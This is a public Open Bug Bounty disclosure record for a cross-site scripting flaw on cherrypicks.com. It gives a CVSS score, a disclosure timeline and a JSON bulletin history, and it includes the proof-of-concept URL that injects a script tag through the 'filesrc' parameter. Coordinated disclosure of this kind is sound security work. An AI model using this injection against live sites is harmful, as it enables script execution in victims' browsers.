ID OBB:360915
Type openbugbounty
Reporter fakessh
Modified 2017-11-22T12:17:00
Description
Open Bug Bounty ID: OBB-360915
Description| Value
---|---
Affected Website:| cherrypicks.com
Open Bug Bounty Program:| Create your bounty program now. It's open and free.
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide:| OWASP XSS Prevention Cheat Sheet
Vulnerable URL:
http://www.cherrypicks.com/products/ibutterfly?filesrc=%27%22/%3E%3Cscript%3Ealert(/OPENBUGBOUNTY/);%3C/script%3E&path;=/opt/lampp/lib/php/File
Coordinated Disclosure Timeline
Description| Value
---|---
Vulnerability Reported:| 23 October, 2017 12:17 GMT
Vulnerability Verified:| 23 October, 2017 12:19 GMT
Website Operator Notified:| 23 October, 2017 12:19 GMT
Public Report Published[without any technical details]:| 23 October, 2017 12:19 GMT
Vulnerability Fixed:| 8 August, 2018 10:17 GMT
Public Disclosure: A security researcher can delete the report before public disclosure, afterwards the report cannot be deleted or modified anymore. The researcher can also postpone public disclosure date as long as reasonably required to remediate the vulnerability.| 22 November, 2017 12:17 GMT
{"id": "OBB:360915", "type": "openbugbounty", "bulletinFamily": "bugbounty", "title": "cherrypicks.com XSS vulnerability ", "description": "##### Open Bug Bounty ID: OBB-360915\n\nDescription| Value \n---|--- \nAffected Website:| cherrypicks.com \nOpen Bug Bounty Program:| Create your bounty program now. It's open and free. \nVulnerable Application:| Custom Code \nVulnerability Type:| XSS (Cross Site Scripting) / CWE-79 \nCVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N] \nRemediation Guide:| OWASP XSS Prevention Cheat Sheet \n \n##### Vulnerable URL:\n \n \n http://www.cherrypicks.com/products/ibutterfly?filesrc=%27%22/%3E%3Cscript%3Ealert(/OPENBUGBOUNTY/);%3C/script%3E&path;=/opt/lampp/lib/php/File\n \n\n##### Coordinated Disclosure Timeline\n\nDescription| Value \n---|--- \nVulnerability Reported:| 23 October, 2017 12:17 GMT \nVulnerability Verified:| 23 October, 2017 12:19 GMT \nWebsite Operator Notified:| 23 October, 2017 12:19 GMT \nPublic Report Published[without any technical details]:| 23 October, 2017 12:19 GMT \nVulnerability Fixed:| 8 August, 2018 10:17 GMT \nPublic Disclosure: A security researcher can delete the report before public disclosure, afterwards the report cannot be deleted or modified anymore. The researcher can also postpone public disclosure date as long as reasonably required to remediate the vulnerability.| 22 November, 2017 12:17 GMT\n", "published": "2017-10-23T12:17:00", "modified": "2017-11-22T12:17:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.openbugbounty.org/reports/360915/", "reporter": "fakessh", "references": [], "cvelist": [], "lastseen": "2018-08-15T19:58:36", "history": [{"bulletin": {"id": "OBB:360915", "type": "openbugbounty", "bulletinFamily": "bugbounty", "title": "cherrypicks.com XSS vulnerability ", "description": "##### Open Bug Bounty ID: OBB-360915\n\nDescription| Value \n---|--- \nAffected Website:| cherrypicks.com \nVulnerable Application:| Custom Code \nVulnerability Type:| XSS (Cross Site Scripting) / CWE-79 \nCVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N] \nRemediation Guide:| OWASP XSS Prevention Cheat Sheet \n \n##### Vulnerable URL:\n \n \n http://www.cherrypicks.com/products/ibutterfly?filesrc=%27%22/%3E%3Cscript%3Ealert(/OPENBUGBOUNTY/);%3C/script%3E&path;=/opt/lampp/lib/php/File\n \n\n##### Coordinated Disclosure Timeline\n\nDescription| Value \n---|--- \nVulnerability Reported:| 23 October, 2017 12:17 GMT \nVulnerability Verified:| 23 October, 2017 12:19 GMT \nWebsite Operator Notified:| 23 October, 2017 12:19 GMT \nVulnerability Published:| 23 October, 2017 12:19 GMT[without any technical details] \nPublic Disclosure:| 21 January, 2018 12:17 GMT\n", "published": "2017-10-23T12:17:00", "modified": "2018-01-21T12:17:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://www.openbugbounty.org/reports/360915/", "reporter": "fakessh", "references": [], "cvelist": [], "lastseen": "2018-03-15T01:16:53", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "openbugbounty": {"patchStatus": "unpatched", "mirror": "http://360915.openbounty.org/mirror/"}}, "lastseen": "2018-03-15T01:16:53", "differentElements": ["description", "modified", "openbugbounty"], "edition": 1}], "viewCount": 0, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "dependencies": {"references": [], "modified": "2018-08-15T19:58:36"}, "vulnersScore": 4.3}, "objectVersion": "1.4", "openbugbounty": {"patchStatus": "patched", "mirror": "http://360915.openbounty.org/mirror/"}, "_object_type": "robots.models.openbugbounty.OpenbugbountyBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.openbugbounty.OpenbugbountyBulletin"]}
{}